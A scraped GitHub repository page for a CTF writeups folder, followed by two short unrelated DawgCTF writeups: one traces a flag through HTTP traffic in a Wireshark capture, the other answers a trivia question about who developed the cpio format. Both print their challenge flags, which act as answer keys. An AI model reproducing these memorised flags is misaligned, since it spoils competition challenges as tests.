<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>0</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/HaoJame/Writeup-CTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":253413964,"originating_url":"https://github.com/HaoJame/Writeup-CTF/tree/master/AUCTF/turkey","user_id":null}}" data-hydro-click-hmac="889165ab763909086c1d195f447cf3cb4908fe5d9afe0cc5984d879faf58cdb5"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/HaoJame/Writeup-CTF/refs" cache-key="v0:1586154714.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="SGFvSmFtZS9Xcml0ZXVwLUNURg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/HaoJame/Writeup-CTF/refs" cache-key="v0:1586154714.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="SGFvSmFtZS9Xcml0ZXVwLUNURg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>Writeup-CTF</span></span></span><span>/</span><span><span>AUCTF</span></span><span>/</span>turkey<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>Writeup-CTF</span></span></span><span>/</span><span><span>AUCTF</span></span><span>/</span>turkey<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/HaoJame/Writeup-CTF/tree-commit/7589c35cf35b5087a26dfac6aa633b5494e18323/AUCTF/turkey" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/HaoJame/Writeup-CTF/file-list/master/AUCTF/turkey"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>turkey</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>turkey.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
In this challenge, we’re given a URL: http://freewifi.ctf.umbccd.io/, and we’re told that it hasn’t been implemented as of yet. We’re also given a .pcapng file. Let’s open wireshark and see what hints we can find! Since our objective is to find data about a URL, let’s use the http protocol filter. We find a string of HTTP packets. I used the export http objects to get a list of web pages being referred and opened.
Through this we can clearly see staff.html is being visited quite often, let’s navigate to that URL. And Voila! We get the flag, easy peezy lemon squeezy.
Flag: DawgCTF{w3lc0m3_t0_d@wgs3c_!nt3rn@t!0n@l}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
### Description What organization developed the archival algorithm used to package Debian's initrd image? ### SolutionAfter searching for "archival algorithm used to package Debian initrd image" we get:
The basic initramfs is the root filesystem image used for booting the kernel provided as a compressed cpio archive Then look for "cpio compression organization" and first result is:
Operating system: Unix and Unix-like Original author(s): Dick Haight Developer(s): AT&T Bell Laboratories
### Flag AT&T Bell Laboratories |
